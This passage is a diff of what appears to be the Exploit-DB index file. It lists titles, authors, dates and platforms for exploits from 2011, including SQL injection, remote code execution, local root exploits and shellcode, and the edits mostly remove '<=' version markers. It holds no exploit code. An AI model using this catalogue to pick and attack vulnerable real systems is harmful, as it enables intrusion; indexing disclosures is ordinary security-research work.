-17992,platforms/php/webapps/17992.txt,"Gnuboard <= 4.33.02 tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 +17992,platforms/php/webapps/17992.txt,"Gnuboard 4.33.02 tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17995,platforms/php/webapps/17995.txt,"NoNumber Framework Joomla! Plugin - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Shellcode Encoder (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection & XSS vulnerabilities",2011-10-19,"Stefan Schurtz",php,webapps,0 @@ -15637,24 +15637,24 @@ id,file,description,date,author,platform,type,port 18000,platforms/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta force_download.php Local File Inclusion",2011-10-19,"Sangyun YOO",php,webapps,0 18001,platforms/php/webapps/18001.txt,"CMSmini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,php,webapps,0 18002,platforms/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",php,webapps,0 -18003,platforms/php/webapps/18003.txt,"fims File Management System <= 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,php,webapps,0 -18004,platforms/php/webapps/18004.txt,"Simple Free PHP Forum Script <= SQL Injection",2011-10-20,Skraps,php,webapps,0 +18003,platforms/php/webapps/18003.txt,"fims File Management System 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,php,webapps,0 +18004,platforms/php/webapps/18004.txt,"Simple Free PHP Forum Script SQL Injection",2011-10-20,Skraps,php,webapps,0 18005,platforms/windows/webapps/18005.txt,"OCS Inventory NG 2.0.1 Persistent XSS",2011-10-20,"Nicolas DEROUET",windows,webapps,0 -18006,platforms/windows/dos/18006.html,"Opera <= 11.52 PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0 +18006,platforms/windows/dos/18006.html,"Opera 11.52 PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0 18007,platforms/windows/dos/18007.txt,"Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0 -18008,platforms/windows/dos/18008.html,"Opera <= 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0 +18008,platforms/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0 18009,platforms/asp/webapps/18009.txt,"Pre Studio Business Cards Designer SQL Injection",2011-10-20,dr_zig,asp,webapps,0 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0 18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Stored XSS",2011-10-20,"Stefan Schurtz",multiple,webapps,0 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0 -18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 +18014,platforms/windows/dos/18014.html,"Opera 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,Metasploit,cgi,remote,0 18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile",2011-10-21,rgod,windows,remote,0 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0 -18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 +18018,platforms/php/webapps/18018.php,"Sports PHool 1.0 - Remote File Inclusion Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread PoC",2011-10-22,pigtail23,windows,dos,0 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0 -18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 - (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 +18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - DoS",2011-10-23,Alguien,php,dos,0 18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 @@ -15668,21 +15668,21 @@ id,file,description,date,author,platform,type,port 18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 -18031,platforms/php/webapps/18031.rb,"phpLDAPadmin <= 1.2.1.1 - (query_engine) Remote PHP Code Injection",2011-10-25,Metasploit,php,webapps,0 +18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection",2011-10-25,Metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console OSExecute Payload Execution",2011-10-24,Metasploit,windows,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop XSS",2011-10-26,M.Jock3R,php,webapps,0 -18036,platforms/php/webapps/18036.txt,"eFront <= 3.6.10 - (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 +18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 - (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,Metasploit,windows,local,0 18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 -18045,platforms/php/webapps/18045.txt,"PHP Photo Album <= 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 +18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 -18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress <= 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 +18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0 @@ -15691,8 +15691,8 @@ id,file,description,date,author,platform,type,port 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader - Local Root Exploit (1)",2011-11-02,zx2c4,linux,local,0 -18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) Remote SQL Injection",2011-11-02,LiquidWorm,php,webapps,0 -18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 - Local File Include",2011-11-02,"Rami Salama",php,webapps,0 +18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) SQL Injection",2011-11-02,LiquidWorm,php,webapps,0 +18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",php,webapps,0 18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite Exploit",2011-11-02,Abysssec,windows,local,0 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 18070,platforms/php/webapps/18070.txt,"Web File Browser 0.4b14 File Download",2011-11-03,"Sangyun YOO",php,webapps,0 @@ -15700,30 +15700,30 @@ id,file,description,date,author,platform,type,port 18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader - Local Root Race Condition Exploit",2011-11-03,zx2c4,linux,local,0 18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,php,webapps,0 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 SQL Injection",2011-11-04,"Yassin Aboukir",php,webapps,0 -18077,platforms/windows/webapps/18077.txt,"hp data protector media operations <= 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 +18077,platforms/windows/webapps/18077.txt,"hp data protector media operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 -18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 +18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (3)",2011-11-04,Metasploit,windows,local,0 -18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 -18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18083,platforms/php/webapps/18083.php,"Zenphoto 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18084,platforms/php/webapps/18084.php,"phpMyFAQ 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Local Root",2011-11-05,zx2c4,linux,local,0 18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote,0 -18090,platforms/php/webapps/18090.txt,"LabStoRe <= 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 -18091,platforms/php/webapps/18091.txt,"OrderSys <= 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 +18090,platforms/php/webapps/18090.txt,"LabStoRe 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 +18091,platforms/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0 18093,platforms/windows/remote/18093.txt,"Oracle XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Exploit",2011-11-07,"David Maman",windows,remote,0 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 (do.php) - CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 -18100,platforms/php/webapps/18100.txt,"labwiki <= 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 +18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)",2011-11-09,Node,windows,remote,0 -18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 - Remote Command Execution",2011-11-13,Metasploit,php,webapps,0 +18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution",2011-11-13,Metasploit,php,webapps,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - DoS",2011-11-11,swami,windows,dos,0 @@ -15731,24 +15731,24 @@ id,file,description,date,author,platform,type,port 18110,platforms/php/webapps/18110.txt,"CMS 4.x.x Zorder (SQL Injection Vul)",2011-11-13,"KraL BeNiM",php,webapps,0 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd Remote Denial of Service Exploit",2011-11-16,condis,linux,dos,80 -18111,platforms/php/webapps/18111.php,"WordPress Zingiri Plugin <= 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 -18132,platforms/php/webapps/18132.php,"Support Incident Tracker <= 3.65 - (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 -18112,platforms/windows/dos/18112.txt,"optima apiftp server <= 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 +18111,platforms/php/webapps/18111.php,"WordPress Zingiri Plugin 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 +18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 +18112,platforms/windows/dos/18112.txt,"optima apiftp server 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,Metasploit,windows,local,0 -18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin <= 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 +18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload",2011-11-15,PCA,php,webapps,0 -18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 +18121,platforms/php/webapps/18121.txt,"FreeWebshop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading",2011-11-19,Metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 -18127,platforms/php/webapps/18127.txt,"Freelancer calendar <= 1.01 SQL Injection",2011-11-19,muuratsalo,php,webapps,0 -18128,platforms/php/webapps/18128.txt,"Valid tiny-erp <= 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 -18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection",2011-11-19,muuratsalo,php,webapps,0 +18127,platforms/php/webapps/18127.txt,"Freelancer calendar 1.01 SQL Injection",2011-11-19,muuratsalo,php,webapps,0 +18128,platforms/php/webapps/18128.txt,"Valid tiny-erp 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 +18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,Metasploit,windows,remote,0 18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)",2011-11-21,hellok,win_x86,local,0 @@ -15756,20 +15756,20 @@ id,file,description,date,author,platform,type,port 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 -18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 +18145,platforms/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0 -18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 -18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (1)",2011-11-23,EgiX,php,webapps,0 +18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 +18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (1)",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 -18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 +18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 -18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 +18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18156,platforms/php/webapps/18156.txt,"php video script SQL Injection",2011-11-25,longrifle0x,php,webapps,0 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 -18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 +18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 @@ -15777,7 +15777,7 @@ id,file,description,date,author,platform,type,port 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0 -18177,platforms/php/webapps/18177.txt,"WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 +18177,platforms/php/webapps/18177.txt,"WikkaWiki 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u) (Metasploit)",2011-11-30,Rh0,windows,local,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0 @@ -15802,36 +15802,36 @@ id,file,description,date,author,platform,type,port 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' SQL-Injection",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,Metasploit,php,webapps,0 -18215,platforms/php/webapps/18215.txt,"SourceBans <= 1.4.8 SQL/LFI Injection",2011-12-07,Havok,php,webapps,0 +18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 SQL/LFI Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 - (Joomla component) SQL injection",2011-12-08,Don,php,webapps,0 18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 -18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 -18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 +18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 +18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 -18224,platforms/php/webapps/18224.php,"Docebo Lms <= 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 +18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 18225,platforms/linux/dos/18225.c,"CSF Firewall Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit",2011-12-10,otr,linux,local,0 -18230,platforms/php/webapps/18230.txt,"FCMS <= 2.7.2 CMS - Multiple Stored XSS",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 +18230,platforms/php/webapps/18230.txt,"FCMS 2.7.2 CMS - Multiple Stored XSS",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 18231,platforms/php/webapps/18231.txt,"WordPress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 -18232,platforms/php/webapps/18232.txt,"FCMS <= 2.7.2 CMS - Multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 +18232,platforms/php/webapps/18232.txt,"FCMS 2.7.2 CMS - Multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 